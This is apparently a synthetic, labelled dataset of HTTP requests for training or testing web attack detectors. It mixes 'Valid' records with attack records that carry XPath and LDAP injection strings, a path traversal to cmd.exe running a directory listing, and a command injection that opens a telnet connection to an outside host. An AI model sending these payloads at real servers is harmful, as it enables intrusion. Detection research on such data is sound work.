UA-Pixels: 629x010
Via: FTP/3.5 224.250.160.124, Ans/5.0 www.2iug.js, 2.2 55.143.51.169
Transfer-Encoding: deflate
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 483 60.145.138.165 "aoanb" "Fri, 09 Dec 05 17:14:05 GMT"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ctgi=1&wfZxp_2JPv=58120309&uz=nwDtokauttlinputm; $h&ur24URTsRG0s=null&esdek=765265&oyeiEsm8fx=7031384664&chToel=7747773&euorr=80333341&E5uant2d=eeisez&ppSL7Wn=bln0elmocha&as3nHn0nde0lmiy=htdcstjp9&qnljhlsiagnl=05660730&qfsZxp_V1p=wp-uiacva1cv

End - Id: 7213
Start - Id: 49679
class: XPathInjection
GET /iiI69fe_yF083rOin/eutt/ac7gbcaew2n6Yyer.html?ristdxbcidstri=tl&ys7SsW5WYj=41Gtzd4&95y=2Rhl%27++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27it%27%3D++++%27&acoai=tpe&unottnetachv2=sC+4A%5Caeb%40oIn&u7tJgroup bypsvp5mr=ntcoTqyce HTTP/1.0
Host: www.harnvwfl.de:31177
Connection: inscn9f1
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate;q=0.5
Accept-Language: *
Cache-Control: min-fresh=322
Client-ip: 102.196.28.62
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="861"
Date: Mon, 21 Jun 04 22:54:23 GMT
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 29 Dec 05 22:23:21 GMT
If-Unmodified-Since: Tue, 30 Dec 08 04:56:48 GMT
If-Match: "M6.AjhD6heqM7jh4fDg"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 5.9
Pragma: 5l0mcv='1Qzs8ic'
Proxy-Authorization: Basic QW9vQzpoYXJhRQ==
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://atitn.be/nlmom.php
TE: chunked,chunked
Trailer: Range
User-Agent: Mozilla/8.9 (compatible; MSIE 0.6; Unix; nRE1dao)
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: HTTP/5.0 118.178.44.198, yea/3.5 218.106.146.168:03
Transfer-Encoding: identity
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49679
Start - Id: 45200
class: PathTransversal
GET ////? HTTP/1.0
Host: 254.82.190.122
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.4, deflate;q=0.4
Accept-Language: n5fNeet-Sedasbi, tAeepnth-moeea1m;q=0.8, j7t3ntt-n, vlpu-cti;q=0.6, tdqisop-hte;q=0.6
Cache-Control: pd=urOniic
Client-ip: 200.164.50.206
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="5"
Date: Wed, 20 Oct 04 21:36:50 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 26 Oct 04 16:15:31 CET
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: "pYAuNA7QveRY2-iLSO"
If-None-Match: "U_hMFHAfVDHKKpWcec04"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 9631
MIME-Version: 1.6
Pragma: msi7tS=oaesapy
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM NTRoaTZ1YWlvZXRUUG90ZUVpdHNycjFkd3MyYjZubmllZQ==
Range: 706278-,584316-,-67
Referer: http://www.owtW.org/yedk/eaUto/snpo/vob2mq/iyet.bin
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 1.5; eo-yh; rv:8.2.8) Gecko/15970525
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: 2.3 224.133.118.188
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45200
Start - Id: 37888
class: LdapInjection
GET /d8/Xnph-XYRm1GCP-N/FPzXn7elk6WcGnw/rAaneix1Cyso9srr.png?hrfmdju3nT=inblike&oi=yrBh-lnau9&deIauac=xAWTsrPIX_56&sdi4bdtecnsq2ae=sqkuocunxande8&sjesigekoli=4649&mahisl=e6zgvIeN&i9xie=1R1_PmfweVh9&cktisqne=i60Gb2cIl_l.&2asimuen=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nOni=649434&szAgttry3prtmlf=in+toits%2Beos HTTP/1.0
Host: www.ed1s.net
Connection: close
Accept: video/quicktime
Accept-Charset: gb2312;q=0.0, windows-1252, koi8-r;q=0.8, iso-2022-jp, cp-936
Accept-Encoding: *
Accept-Language: ibnsteJ-sdsei;q=0.8, rtl-9ir, a9rbeg-8hiunrl;q=0.8, aildr-1Z
Cache-Control: no-store
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="0"
Date: Wed, 08 Feb 06 11:15:27 UTC
ETag: W/"pNxix-WiJNQLVltQ"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 14 Sep 05 03:41:56 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: "m52lgc36FopxNka"
If-None-Match: *
If-Range: Sat, 13 Sep 08 06:11:14 CET
Max-Forwards: 12
MIME-Version: 6.3
Pragma: mh4ni=5liu2Imm
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=ebfc4BaD
Range: 41-534098,-55
Referer: http://atCA.com/waesa/veno.avi
TE: chunked;q=0.3,deflate,trailers
Trailer: Authorization
User-Agent: ltoes0hqe/0.8.1.7
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 5.5 34.218.223.96, 7.2 www.edda.jpg, 5.6 57.199.50.218
Transfer-Encoding: liAs; 8SduoEwr=AtsoWw5L
Upgrade: tcig/4.0, RShRui/9.0, srvafl/9.7, nklzey/9.3
Warning: 062 148.228.41.113 "sStn" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37888
Start - Id: 27424
class: Valid
GET /stgzbCaihsUjliclj/dneohso/mpendeli/lmsmdnishxRn/Nx8XKfNNBPEt-40/g_d3WTiE/ulmtvTsez/obcZSC.rNxEvR2oGMCV/1htrInce.bin?Fsylaxtr21t=34019550&CE2gskRCE@=+f&eHwR98=nj&lnloDeaadsnit=48627&tem7vnfpu8c=50&9uridbsieIiltAe=P5beomairxtermOsi HTTP/1.0
Host: www.tilermte6.ch
Connection: idois
Accept: application/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: ohocasne='hhld9s'
Client-ip: 54.57.18.195
Cookie: rR9tvdwiuft5=Lbinegs g;aOtt6slemnThL=7;gchZ0eleC=73;nwx=ro)nda<ix@teeT p
Cookie2: $Version="31"
Date: Sat, 04 Apr 09 18:58:03 CET
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: mkpuh@Norr.org
If-Modified-Since: Thu, 15 Jan 04 01:41:59 UTC
If-Unmodified-Since: Wed, 28 Sep 05 21:42:20 CET
If-Match: "U9qzHFD.PRu2ARQDF"
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: htslms lbatnele=Hahtt
Authorization: Digest nc=050aE77a
Range: 1-934014,17-,-15857
Referer: /ls43.mp3
TE: trailers
Trailer: If-Modified-Since
User-Agent: f0z0Rz http://www.occr.cz
UA-CPU: x86
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 759x1141
Via: HTTP/0.7 64.99.11.147
Transfer-Encoding: compress
Upgrade: e9st/6.7, aiat/8.4, uCEhe/7.1
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 526876
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27424
Start - Id: 26150
class: Valid
GET /aWP-y3Y6fN/cnrlLko6bobhspl/stE95/imgdn/aMSkIBjRldLsg29RXfi/ar/cEpC.CE.mdb? HTTP/1.1
Host: www.yonww.be
Connection: close
Accept: application/rtf
Accept-Charset: iso-10646-ucs-2, iso-8859-1, x-mac-chinesesimp;q=0.2, iso-2022-jp
Accept-Encoding: 
Accept-Language: r1EyNTie-stCn;q=0.1
Cache-Control: max-stale
Client-ip: 12.181.118.107
Cookie: ghSbYzY=05015619
Cookie2: $Version="87"
Date: Mon, 22 Mar 04 04:08:57 GMT
ETag: W/"APhYenWjVHyPtzW"
Expect: iydni
From: hrNoh@eerlbd.be
If-Modified-Since: Tue, 31 Mar 09 13:19:23 CET
If-Unmodified-Since: Fri, 19 Jun 09 05:13:48 CET
If-Match: *
If-None-Match: "l6XHmbAsfJcCFXuD7"
If-Range: Sun, 13 Jun 04 14:49:45 GMT
Max-Forwards: 048
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: eMdoo Wn3r8=eoab9tE3
Authorization: Basic aW5kOWtlOnVob3Nlc24=
Range: 94-,-44714
Referer: /eybWt/lmxlmn7o.txt
TE: gzip;q=0.1
Trailer: Warning
User-Agent: lncrrhn/8.6.0
UA-CPU: 68000
UA-Disp: 8220,770,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/5.7 149.106.252.38:55
Transfer-Encoding: ofNu
Upgrade: maeo2o/2.2, eosi/5.2
Warning: 243 215.45.32.215 "eictewu8s0mtw5" 
X-Forwarded-For: 212.197.71.231
X-Serial-Number: 118955
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26150
Start - Id: 22353
class: Valid
GET /EAkfENzz/rpoisrbs4aena4aoi2eh/iLcqKUh9Rt/mJz@X/iLRxya2-jav/nmoOdhldWbiescuitse4/trWp3mA/eqbIh5N4xl6IHx92Rlr/uhrheh/r41Own_x/Dm.msf? HTTP/1.0
Host: 117.247.81.182:98409
Connection: close
Accept: audio/*, audio/*, text/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 169.90.69.255
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="98"
Date: Mon, 10 Jul 06 02:58:16 CET
ETag: "nnZGFJrx.lpcnTT337yK"
Expect: efzrn
From: ehfibls1@lhrs6.org
If-Modified-Since: Tue, 08 Jun 04 19:31:13 UTC
If-Unmodified-Since: Fri, 12 Jun 09 09:38:55 CET
If-Match: *
If-None-Match: "GxV9dvHHvdtHvDgIIz"
If-Range: Sat, 31 May 08 20:24:23 CET
Max-Forwards: 25
MIME-Version: 6.4
Pragma: At1s='uairne3'
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 6536-,57214-8762
Referer: http://rhiEi.gov/3c6ehred.php4
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 1.7; ie-hn; rv:9.1.6) Gecko/69573492
UA-CPU: 68000
UA-Disp: 369,681,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8113x683
Via: FTP/6.4 www.duewe.js:0, HTTP/3.5 www.eIcrtv.png
Transfer-Encoding: esle
Upgrade: aos/2.3, onrpu/3.4
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22353
Start - Id: 37091
class: LdapInjection
GET /rr2ocOofw3ebuiaz/mBtJ-r4VQ/nt775NrBJEAHn/oa/NDrOform8/enenkteosfAihciHs0rr/nstosrilnnshmsk/9NYin/eXYa/EyNdoetzawe/ls_xum/crZt@7.mdb?orsfeicdvairem5=netef&wiosd=37&duvihrn=4056%29%28%26%28objectClass%3Dnpze%29%28%7C%28sn+++%3D+++a8%29%28cn%3D3+++++J*%29%29&emrn=grirs&escTlWcurtwzke=00931&44ZHkM=961&NOYM=fn&necRgsr=70744&j6styleSl.Ujsamk8=Ntec&xhrcopy=wst&tnednD0nbDsmCr=e HTTP/1.1
Host: www.nthoetrbd.be
Connection: close
Accept: text/xml, video/quicktime;q=0.1, text/plain;q=0.7
Accept-Charset: iso-8859-8-i;q=0.9
Accept-Encoding: 
Accept-Language: ntyuda-t3dfmo;q=0.8, do7xAx-kelalaE;q=0.2, h-ehxs, a9G6tnr7-peaeeuil;q=0.5, hq-NEnodba;q=0.9
Cache-Control: only-if-cached
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="3"
Date: Wed, 10 Mar 10 12:57:48 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: isenqanI@dizsiba.uk
If-Modified-Since: Thu, 13 Oct 05 16:55:29 UTC
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: "BshOAClwwBntKUjX"
Max-Forwards: 556
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic czJhc0Vkcmg6cG5lbnNpcnQ=
Range: -02647,-19,13378-743741
Referer: http://www.guaeans.be/8netts/3Et1eL/ty6es.jsp
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/8.7 (X11; U; Linux i586 9.6; ft-AR; rv:9.8.0) Gecko/23857773
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7857x018
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: gzip
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37091
Start - Id: 10394
class: Valid
GET /iq0ssihdstesy.htm?ose=3463083&zmx0_eK=9821621&lae=it&yi13ntxwrne6b=eTcsepsew HTTP/1.0
Host: www.uheeuNnln.uk
Connection: wrAmO
Accept: audio/x-wav;q=0.1, audio/x-wav;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.195.254.224
Cookie: eR9egxoKdnaTyas=o7slftd;arcdeiichjt=xu;tnrnEsrr8ePs=8035;nfi5a=eh2w;H6zEc=hw i
Cookie2: $Version="2"
Date: Fri, 14 Nov 08 06:22:01 CET
ETag: W/"YrYs7dYn9ZOwsxUUr3B3"
Expect: hxutl
From: hk3e@njeebui.st
If-Modified-Since: Fri, 19 Mar 10 18:19:39 GMT
If-Unmodified-Since: Thu, 15 Dec 05 22:39:23 CET
If-Match: *
If-None-Match: "1CwpsTltKpU4wDbd"
If-Range: Sat, 04 Sep 04 02:49:02 UTC
Max-Forwards: 86
MIME-Version: 3.9
Pragma: 6='u'
Proxy-Authorization: NTLM bk5mMWhvODhwR2VwaGlhZXM3c3hvZXJhc2h5Z25xaXRlbkp4Ym51eA==
Authorization: NTLM aWFtYnNtZXNvdnkwdWJVdHNvcmF0c2lxZFRsNnVhcmhpeQ==
Range: 5-355295,61313-1,05930-37268
Referer: /tRmxj2/xrol/tpn0ttur.js
TE: deflate;q=0.5,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/6.4 (X11; U; Unix 2.0; n8-um; rv:6.6.0) Gecko/36637523
UA-CPU: MIPS
UA-Disp: 6128,5212,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: 3.0 80.231.84.106, FTP/1.9 www.heeeoocs.js
Transfer-Encoding: identity
Upgrade: ooemaN/5.3, ditt/1.9, elyst/6.6
Warning: 115 95.246.217.60 "BneDa1I" 
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10394
Start - Id: 43777
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: www.snqer10if.ch:80
Connection: cwdIt
Accept: audio/*
Accept-Charset: windows-1252;q=0.6, iso-8859-3;q=0.2, cp-932
Accept-Encoding: 
Accept-Language: ul-euE;q=0.9, 9-sonewDY
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Sat, 16 Aug 08 03:56:23 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Wed, 30 Dec 09 16:41:50 CET
If-Unmodified-Since: Sun, 07 Oct 07 22:38:48 UTC
If-Match: *
If-None-Match: "Cqtwsq1.kTy4dCdQ0z"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.5
Pragma: ts=drlowint
Proxy-Authorization: Digest opaque="leSssie"
Authorization: ifna sietuw=6ratieE
Range: 10571-03
Referer: http://www.gittgenr.cz/1aetIfsI/6Dda99m/uime/llri/ahde.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: pOinion/1.6
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1293x0631
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: compress
Upgrade: ewh/0.7, qtnudf/8.8, ons9t/6.0, an7/8.9, raHeu/7.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43777
Start - Id: 43052
class: OsCommanding
PUT /smtsAA9n/ioo6xiosqaaum1Pdte/er3v/sTN./ptr.js? HTTP/1.1
Content-Length: 330
Content-Language: Thcl0re,d5rn,hnrtawne
Content-Encoding: identity
Content-Location: /kratr/escusdis.conf
Content-MD5: cnNmaW5TU3M3dG9na3Zscw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Feb 06 14:56:39 UTC
Last-Modified: Sat, 15 Jul 06 03:16:33 GMT
Host: 170.201.32.119
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, x-mac-roman, x-mac-icelandic
Accept-Encoding: *;q=0.0
Accept-Language: atra-bcgT9oe, ec-pc, 7-wfeeeAh;q=0.4, oaoRnhc-8oclf;q=0.8
Cache-Control: no-cache
Client-ip: 200.48.70.10
Cookie: nitsrrlpntwohuL=sNld-;oiru9d=7;a@betweenqJH0-=tuomarsntviysr8m
Cookie2: $Version="392"
Date: Thu, 22 Apr 10 14:27:48 CET
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: "xq-xA0QgKXNFJcwSct"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6030
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Digest algorithm=MD5
Range: -300480,70515-77810,-4510
Referer: /h1zse/nftRaxcz/iauihbM.css
TE: gzip
Trailer: If-Range
User-Agent: aym7qsYA http://www.gawluT.com
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: Ndtg/2.5 128.179.72.244:5178, 3.1 www.cutsgis.htm, 2.9 218.213.194.188
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

btmo4E=39873&Meeez=\"    \;   \/usr\/bin\/telnet   www.lieticri.com   84\;&bavbhr6i=15348&oosRsxe=ftUa2Df9t&afewTn14e8=odteosAsamxanienirHhttpsi &swetcEhx6lk=yaz'&t74ajMhieAEdeo=re&scriptprocessing-instructionOeselectmiS=raq5j73&SZXIHG=5587&DuUOeVZYpzN=1XXz1I&vttk90iepRc0=awaK&EeeeyhhDaZl=opene9w allx0y

End - Id: 43052
Start - Id: 28114
class: Valid
GET /7etrit7/ey.IBWVmgd.nsf?smnideweycem=iWvUe0.RVstf&noFahcuGNBvos=-cnftp8htdate+t&tsdaelh4e2l=310763461 HTTP/1.1
Host: 183.219.204.41
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: oih2h-trl;q=0.6, 9Ei3i-uoHuj7g;q=0.4, sWi-i
Cache-Control: max-stale
Client-ip: 219.78.190.9
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="0"
Date: Fri, 08 Apr 05 15:18:28 UTC
ETag: W/"iHQda_C-FUBqOY_S"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Sun, 22 May 05 23:23:40 GMT
If-Unmodified-Since: Sat, 05 Nov 05 18:16:21 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 11 May 05 01:09:17 CET
Max-Forwards: 4
MIME-Version: 1.2
Pragma: untcE=gult
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: omam6o mneshru=rhce
Range: 0-
Referer: http://ux7kr9r.ch/hntAtnsr/7oots/rsyted/astaetjc.jpeg
TE: chunked;q=0.8,trailers
Trailer: Connection
User-Agent: 91yiaCot http://www.0aoee.de
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: compress
Upgrade: laa/1.4
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 3455337535861229
----: -------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28114
Start - Id: 32046
class: Valid
GET /qTx24sik42tRnjtail/TteoiihrrEc8.jpg? HTTP/1.0
Host: 247.135.244.92:27
Connection: v0unee
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: tooe5-ersrept, ee-inur, nne-up, wi9rgEh0-yfr
Cache-Control: ln='ca6'
Client-ip: 136.245.158.231
Cookie: rTr8isnthmImka=e h;adrs=xa'atamftonlgu;dIt=sstth0insertsei~sio5;vOIjh=31858;zucatE@kWcG-g=Ieqcaccaoy;E5U=;0-httpl
Cookie2: $Version="7"
Date: Tue, 01 Jul 08 10:06:15 GMT
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: 7Shh@remFh.cz
If-Modified-Since: Wed, 24 Aug 05 22:37:48 GMT
If-Unmodified-Since: Tue, 30 May 06 03:14:20 GMT
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: "VR8kxpSdkMB-..tGcI"
If-Range: "49Euc6OpK@QRqNE4k"
Max-Forwards: 06
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: NTLM MTlzYWVzN2F0bmNhdGlmbGhwZHNkYWFhb3lVYW5BeWh1
Range: 23518-
Referer: /lhsah/hmyhs/vwll/en9tv/drreoapt.dll
TE: chunked;q=0.7,trailers,chunked
Trailer: If-Range
User-Agent: ss9N (ccC-N43.; g-v5Y0; k.EHle44P; b0N6s2t; uh@w21-)
UA-CPU: x86
UA-Disp: 097,6604,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: compress
Upgrade: nswin/2.0, nrnelw/2.2
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 158.151.229.231
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32046
Start - Id: 49846
class: XPathInjection
GET /AotfelsnornInm/sOfUW7Y4_9/sQNf/tSBNxHMQ_lYiobguErHJ/egyGSDshDj4qPz@.png?psEee4eo=suus%27+++or++++6+%3C+++count%28path%2Fchild%3A%3A*%29+++++or++%27tpt%27+%3D+%27&jeddgoti4xsbe=0cg5rhl8ietcld8e&CZyv=tjptimgargH+bgu&LP7I=1506&fVcopy8Z=83 HTTP/1.1
Host: 201.250.0.237
Connection: e5ea
Accept: */*
Accept-Charset: iso-8859-5;q=0.5, macintosh;q=0.3, cp-936;q=0.3
Accept-Encoding: gzip;q=0.5, deflate;q=0.3
Accept-Language: *;q=0.6
Cache-Control: max-age=6
Client-ip: 167.249.63.97
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 06:01:58 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: ackeIlr=n1aE
From: ohlydam@WdehaAi.biz
If-Modified-Since: Thu, 14 Oct 04 08:55:55 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: "YqnKb.9Hz0Noklq"
Max-Forwards: 69
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: i0phE o2nl=eewznpi
Range: 376648-,445-
Referer: /f8Ascse/pasmiot/oimt4/ehienneu/jI3s9.asmx
TE: deflate
Trailer: Accept
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 4.9; ar-et; rv:7.5.4) Gecko/75677351
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 967x245
Via: 7.4 www.emxdo9.html, 0.2 102.24.240.116, ftoh/6.0 www.eodiin.css:8449
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 490 229.47.175.202 "enpes8N" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49846
Start - Id: 9370
class: Valid
GET /engie5u.php?rlIuW2ojuumda7r=6PswhereUs%40%24ntt&iro5Xrq=9156884&nsRstnei=26778578&qedrtaiemnEmtt=rtmSejlnt9esoechoa&cltslau5btnOwn=ok3vo&tlo=sbRJgZ.zKSK&vhi0dnttrdcet0t=eeoMo&qvdsueesssthDjC=ytao%40&0nsglcomrn=5&ha4n7rtatfe=985760&heFejedoSnwdaua=%7E4s&iSf4rleig5e=lr HTTP/1.0
Host: www.donoS5am.biz:06
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 243.234.59.13
Cookie: n4x.c6JPvxterm7=h)StE9;tmpLtM5iqV=oTqhi
Cookie2: $Version="0"
Date: Fri, 29 Apr 05 17:11:01 GMT
ETag: "kOEtKOOZ@BqLytEYE"
Expect: 100-continue
From: ofie@0ert.fr
If-Modified-Since: Mon, 12 Jan 04 24:16:49 CET
If-Unmodified-Since: Tue, 01 Jul 08 11:16:42 GMT
If-Match: *
If-None-Match: *
If-Range: "n_u1_bRWJUSeqbO"
Max-Forwards: 513
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Digest realm
Range: -38990,-9
Referer: http://aataidho.fr/aef06uu/Ii7ch.wav
TE: trailers
